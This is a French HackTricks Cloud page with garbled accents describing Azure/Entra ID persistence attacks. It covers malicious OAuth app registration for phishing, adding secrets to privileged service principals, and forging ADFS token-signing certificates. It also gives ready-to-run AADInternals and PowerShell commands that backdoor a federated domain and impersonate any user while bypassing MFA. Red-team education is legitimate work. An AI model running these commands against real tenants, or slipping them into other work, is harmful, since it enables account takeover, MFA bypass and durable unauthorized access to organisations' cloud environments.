Az - Persistence
Tip
Apprenez & pratiquez AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Apprenez & pratiquez GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Apprenez & pratiquez Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Soutenez HackTricks
- Consultez les subscription plans!
- Rejoignez le đŹ Discord group ou le telegram group ou suivez-nous sur Twitter đŠ @hacktricks_live.
- Partagez des hacking tricks en soumettant des PRs aux HackTricks et HackTricks Cloud github repos.
OAuth Application
Par dĂ©faut, tout utilisateur peut enregistrer une application dans Entra ID. Vous pouvez donc enregistrer une application (uniquement pour le locataire cible) qui nĂ©cessite des autorisations Ă fort impact avec le consentement de lâadministrateur (et lâapprouver si vous ĂȘtes lâadministrateur) - comme envoyer des mails au nom dâun utilisateur, la gestion des rĂŽles, etc. Cela nous permettra dâexĂ©cuter des attaques de phishing qui seraient trĂšs fructueuses en cas de succĂšs.
De plus, vous pourriez Ă©galement accepter cette application avec votre utilisateur comme moyen de maintenir lâaccĂšs.
Applications et Principaux de Service
Avec les privilĂšges dâAdministrateur dâApplication, GA ou un rĂŽle personnalisĂ© avec des permissions microsoft.directory/applications/credentials/update, nous pouvons ajouter des identifiants (secret ou certificat) Ă une application existante.
Il est possible de cibler une application avec des autorisations Ă©levĂ©es ou dâajouter une nouvelle application avec des autorisations Ă©levĂ©es.
Un rĂŽle intĂ©ressant Ă ajouter Ă lâapplication serait le rĂŽle dâadministrateur dâauthentification privilĂ©giĂ©e car il permet de rĂ©initialiser le mot de passe des Administrateurs Globaux.
Cette technique permet également de contourner la MFA.
$passwd = ConvertTo-SecureString "J~Q~QMt_qe4uDzg53MDD_jrj_Q3P.changed" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("311bf843-cc8b-459c-be24-6ed908458623", $passwd)
Connect-AzAccount -ServicePrincipal -Credential $credentials -Tenant e12984235-1035-452e-bd32-ab4d72639a
- Pour lâauthentification basĂ©e sur des certificats
Connect-AzAccount -ServicePrincipal -Tenant <TenantId> -CertificateThumbprint <Thumbprint> -ApplicationId <ApplicationId>
Federation - Certificat de signature de jeton
Avec des privileges DA sur AD local, il est possible de crĂ©er et dâimporter de nouveaux certificats de signature de jeton et de dĂ©cryptage de jeton qui ont une trĂšs longue validitĂ©. Cela nous permettra de nous connecter en tant que nâimporte quel utilisateur dont nous connaissons lâImmutableID.
ExĂ©cutez la commande ci-dessous en tant que DA sur le(s) serveur(s) ADFS pour crĂ©er de nouveaux certificats (mot de passe par dĂ©faut âAADInternalsâ), les ajouter Ă ADFS, dĂ©sactiver le renouvellement automatique et redĂ©marrer le service :
New-AADIntADFSSelfSignedCertificates
Ensuite, mettez Ă jour les informations du certificat avec Azure AD :
Update-AADIntADFSFederationSettings -Domain cyberranges.io
Fédération - Domaine de confiance
Avec des privilĂšges GA sur un locataire, il est possible dâajouter un nouveau domaine (doit ĂȘtre vĂ©rifiĂ©), de configurer son type dâauthentification en tant que FĂ©dĂ©rĂ© et de configurer le domaine pour faire confiance Ă un certificat spĂ©cifique (any.sts dans la commande ci-dessous) et Ă lâĂ©metteur :
# Using AADInternals
ConvertTo-AADIntBackdoor -DomainName cyberranges.io
# Get ImmutableID of the user that we want to impersonate. Using Msol module
Get-MsolUser | select userPrincipalName,ImmutableID
# Access any cloud app as the user
Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http://any.sts/B231A11F" -UseBuiltInCertificate -ByPassMFA$true
Références
Tip
Apprenez & pratiquez AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Apprenez & pratiquez GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Apprenez & pratiquez Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Soutenez HackTricks
- Consultez les subscription plans!
- Rejoignez le đŹ Discord group ou le telegram group ou suivez-nous sur Twitter đŠ @hacktricks_live.
- Partagez des hacking tricks en soumettant des PRs aux HackTricks et HackTricks Cloud github repos.
HackTricks Cloud

